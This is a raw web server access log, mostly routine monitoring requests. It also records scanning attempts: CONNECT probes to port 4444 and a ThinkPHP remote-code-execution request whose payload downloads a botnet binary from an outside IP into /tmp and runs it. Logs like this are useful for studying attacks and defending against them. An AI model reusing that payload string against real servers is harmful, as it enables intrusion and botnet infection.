212.91.246.72 - - [01/Nov/2021:14:15:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:17:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.53 - - [01/Nov/2021:14:17:03 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
45.93.250.46 - - [01/Nov/2021:14:17:48 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
212.91.246.72 - - [01/Nov/2021:14:18:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:19:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:20:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:21:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:22:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:23:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:24:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.62.185 - - [01/Nov/2021:14:24:19 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Nov/2021:14:25:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
86.157.2.211 - - [01/Nov/2021:14:25:52 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.14.226.120/notabotnet/notabotnet.x86 -O /tmp/.notabotnet; chmod 777 /tmp/.notabotnet; /tmp/.notabotnet ThinkphpRep' HTTP/1.1" 404 310 "-" "Tsunami/2.0"
212.91.246.72 - - [01/Nov/2021:14:26:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
